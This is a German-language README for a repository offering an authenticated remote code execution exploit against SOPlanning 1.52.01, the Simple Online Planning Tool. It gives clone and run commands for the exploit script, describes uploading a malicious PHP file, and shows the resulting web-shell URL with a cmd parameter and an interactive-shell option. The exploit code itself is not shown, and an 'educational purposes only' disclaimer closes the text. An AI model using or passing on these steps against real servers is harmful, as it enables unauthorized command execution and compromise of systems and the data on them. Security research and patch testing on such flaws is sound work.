
# Exploit für SOPlanning 1.52.01 (Simple Online Planning Tool) – Remote Code Execution (RCE) (Authentifiziert)
Dieses Repository enthält einen Exploit für eine Remote Code Execution (RCE)-Schwachstelle in SOPlanning Version 1.52.01. Der Exploit ermöglicht es authentifizierten Benutzern, eine schädliche PHP-Datei hochzuladen und beliebige Befehle auf dem Server auszuführen.
requests-Bibliothek (Installation mit pip install requests)Klonen Sie dieses Repository:
git clone https://github.com/TheExploiters/SOPlanning-RCE-1.52.01.git
cd SOPlanning-RCE-1.52.01
Führen Sie das Exploit-Skript aus:
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
Ersetzen Sie http://example.com:9090 durch die Ziel-URL, admin durch den Benutzernamen und admin durch das Passwort.
Nach erfolgreicher Ausführung greifen Sie auf die Web-Shell zu:
Access webshell here: http://example.com/upload/files/{link_id}/{php_filename}?cmd=<command>
Um die interaktive Shell zu verwenden, antworten Sie mit yes, wenn Sie dazu aufgefordert werden.
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <target> -u <user> -p <pass>
Dieser Exploit wurde von Ardayfio Samuel Nii Aryee verfasst und dient ausschließlich Bildungszwecken. Der Autor und der Repository-Inhaber sind nicht verantwortlich für Missbrauch oder verursachte Schäden. Stellen Sie sicher, dass Sie eine ausdrückliche Genehmigung haben, bevor Sie diesen Exploit an einem System testen.